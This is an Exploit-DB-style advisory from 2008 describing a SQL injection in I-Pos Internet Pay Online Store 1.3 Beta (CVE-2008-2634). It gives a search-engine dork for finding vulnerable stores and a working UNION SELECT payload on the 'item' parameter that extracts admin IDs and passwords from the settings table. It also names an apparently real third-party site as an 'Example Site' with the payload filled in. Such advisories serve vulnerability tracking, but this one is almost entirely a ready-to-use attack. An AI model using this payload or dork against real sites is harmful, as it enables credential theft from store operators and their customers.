I-Pos Internet Pay Online Store <= 1.3 Beta SQL Injection Vulnerability

2008-06-01T00:00:00
ID EDB-ID:5717
Type exploitdb
Reporter KnocKout
Modified 2008-06-01T00:00:00

Description

I-Pos Internet Pay Online Store <= 1.3 Beta SQL Injection Vulnerability. CVE-2008-2634. Webapps exploit for asp platform

                                        
                                            [+] Title : I-Pos Internet Pay Online Store v1.3 Beta &lt;= Remote SQL Injection Vulnerability

==========================================================================================

[+] Author : KnocKout
[+] Special ThanX : Dr.Kacak & Cr@zy-King and CW ALL USERS . . .
[+] Cyber-Warrior.Org

===========================================================================================

S. Name : I-Pos Internet Pay Online Store
Version : 1.3 Beta
Download : http://www.asprehberi.net/Indir.asp?IcerikID=1812&SessionID=358055325
Dork : "Powered by i-pos Storefront"

Attackz;

Http://Localsite.com/path/index.asp?item=[SQL Injection]

Example Attack: http://localsite.com/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings
Example Site: www.keysquality.com/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings

######################################################################################################

# milw0rm.com [2008-06-01]